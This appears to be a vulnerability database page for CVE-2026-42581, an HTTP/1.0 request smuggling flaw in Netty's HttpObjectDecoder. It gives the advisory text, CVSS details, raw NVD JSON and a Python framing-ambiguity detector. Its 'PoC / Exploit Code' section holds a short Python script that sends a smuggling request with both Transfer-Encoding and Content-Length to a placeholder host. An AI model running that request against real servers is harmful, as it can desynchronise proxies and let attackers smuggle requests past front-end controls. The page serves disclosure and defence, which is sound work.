Security Vulnerability Report
CVE-2026-42581 CVSS 5.8 MEDIUM

CVE-2026-42581

Published: 2026-05-13 19:17:24
Last Modified: 2026-05-14 16:26:50

Description

Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpObjectDecoder strips a conflicting Content-Length header when a request carries both Transfer-Encoding: chunked and Content-Length, but only for HTTP/1.1 messages. The guard is absent for HTTP/1.0. An attacker that sends an HTTP/1.0 request with both headers causes Netty to decode the body as chunked while leaving Content-Length intact in the forwarded HttpMessage. Any downstream proxy or handler that trusts Content-Length over Transfer-Encoding will disagree on message boundaries, enabling request smuggling. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.
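As an added illustration of the framing disagreement the description refers to (example code written for this page, not Netty's code and not from the advisory): the request bytes are constructed from the PoC payload shown further down this page, `forwarded_headers` is a model of the version-dependent guard exactly as the description states it and not Netty's implementation, and the remaining function names are this example's own. It parses one request, measures where Content-Length and chunked framing each end the body, and flags the ambiguous case independently of the HTTP version.

```python
"""Added example (not Netty's code and not from the advisory): detect ambiguous
HTTP/1.x framing, i.e. a request carrying both Transfer-Encoding: chunked and
Content-Length, and show why a version-dependent guard leaves HTTP/1.0 exposed.
The request bytes below are constructed from the PoC payload on this page."""

CRLF = b"\r\n"

# Constructed sample: the HTTP/1.0 request from the page's PoC, with a
# Content-Length (10) that does not match the chunked framing (15 bytes).
SAMPLE_REQUEST = (
    b"POST / HTTP/1.0\r\n"
    b"Host: target.example.com\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Content-Length: 10\r\n"
    b"Connection: keep-alive\r\n"
    b"\r\n"
    b"5\r\nHello\r\n0\r\n\r\n"
)


def parse_request(raw):
    """Split raw bytes into (version, [(name_lower, value)], body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete request head")
    lines = head.split(CRLF)
    version = lines[0].decode("ascii").rsplit(" ", 1)[-1]
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip().lower().decode("ascii"),
                        value.strip().decode("ascii")))
    return version, headers, body


def is_chunked(headers):
    """True when 'chunked' is the final transfer coding (RFC 7230 section 3.3.1)."""
    for name, value in headers:
        if name == "transfer-encoding":
            codings = [c.strip().lower() for c in value.split(",")]
            if codings and codings[-1] == "chunked":
                return True
    return False


def content_length(headers):
    """Declared Content-Length as int, None if absent; duplicates or non-digits raise."""
    values = {v for n, v in headers if n == "content-length"}
    if not values:
        return None
    if len(values) != 1 or not next(iter(values)).isdigit():
        raise ValueError("invalid or conflicting Content-Length")
    return int(values.pop())


def chunked_span(body):
    """Bytes consumed by chunked framing (chunks, last-chunk, trailers, empty line),
    or None if the body is incomplete."""
    pos = 0
    while True:
        end = body.find(CRLF, pos)
        if end < 0:
            return None
        size = int(body[pos:end].split(b";")[0].strip(), 16)  # ignore chunk extensions
        pos = end + 2
        if size == 0:
            while True:  # trailer section ends with an empty line
                end = body.find(CRLF, pos)
                if end < 0:
                    return None
                line, pos = body[pos:end], end + 2
                if not line:
                    return pos
        if len(body) < pos + size + 2:
            return None
        pos += size + 2  # chunk data plus its CRLF


def forwarded_headers(version, headers, patched):
    """Model of the guard the advisory describes (an assumption, not Netty's code):
    before the fix the conflicting Content-Length is dropped only for HTTP/1.1;
    after the fix it is dropped for every version once the body is chunked."""
    if is_chunked(headers) and (patched or version == "HTTP/1.1"):
        return [(n, v) for n, v in headers if n != "content-length"]
    return list(headers)


def framing_report(raw):
    """Where each framing rule ends the body, and whether the two disagree."""
    version, headers, body = parse_request(raw)
    chunked = is_chunked(headers)
    report = {
        "version": version,
        "headers": headers,
        "content_length": content_length(headers),
        "chunked_span": chunked_span(body) if chunked else None,
    }
    # Both framings present is the CWE-444 condition; a downstream hop that
    # prefers Content-Length will cut the body at a different byte.
    report["ambiguous"] = chunked and report["content_length"] is not None
    return report


if __name__ == "__main__":
    r = framing_report(SAMPLE_REQUEST)
    print(r["version"], "Content-Length:", r["content_length"],
          "chunked framing:", r["chunked_span"], "ambiguous:", r["ambiguous"])
    for patched in (False, True):
        kept = content_length(forwarded_headers(r["version"], r["headers"], patched))
        print("patched" if patched else "pre-fix", "forwards Content-Length:", kept)
```

For the sample request the two rules end the body 5 bytes apart (Content-Length says 10, chunked framing consumes 15), and only the patched model strips Content-Length on HTTP/1.0. The defensive use is the `ambiguous` flag: a gateway check or a log-based detection that rejects or alerts on any message carrying both framings, whatever its version, rather than trusting either header.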

CVSS Details

CVSS Score
5.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N

Configurations (Affected Products)

No CPE configuration data available yet (NVD status: Undergoing Analysis). Affected versions per the advisory description:

Netty 4.1.x < 4.1.133.Final
Netty 4.2.x < 4.2.13.Final

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket

# Target host and port
host = 'target.example.com'
port = 80

# Malicious HTTP/1.0 request with both Transfer-Encoding and Content-Length
# Netty will decode as chunked but forward Content-Length
payload = (
    "POST / HTTP/1.0\r\n"
    "Host: {}\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Transfer-Encoding: chunked\r\n"
    "Content-Length: 10\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
    "5\r\n"
    "Hello\r\n"
    "0\r\n"
    "\r\n"
).format(host)


def send_request():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.send(payload.encode())
    response = s.recv(4096)
    print(response.decode())
    s.close()


if __name__ == "__main__":
    send_request()
```

References

https://github.com/netty/netty/security/advisories/GHSA-xxqh-mfjm-7mv9 (GitHub Security Advisory)
Weakness: CWE-444 (Inconsistent Interpretation of HTTP Requests, 'HTTP Request/Response Smuggling')
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-42581",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-13T19:17:23.627",
    "lastModified": "2026-05-14T16:26:50.047",
    "vulnStatus": "Undergoing Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpObjectDecoder strips a conflicting Content-Length header when a request carries both Transfer-Encoding: chunked and Content-Length, but only for HTTP/1.1 messages. The guard is absent for HTTP/1.0. An attacker that sends an HTTP/1.0 request with both headers causes Netty to decode the body as chunked while leaving Content-Length intact in the forwarded HttpMessage. Any downstream proxy or handler that trusts Content-Length over Transfer-Encoding will disagree on message boundaries, enabling request smuggling. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N",
            "baseScore": 5.8,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-444"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/netty/netty/security/advisories/GHSA-xxqh-mfjm-7mv9",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/netty/netty/security/advisories/GHSA-xxqh-mfjm-7mv9",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}
```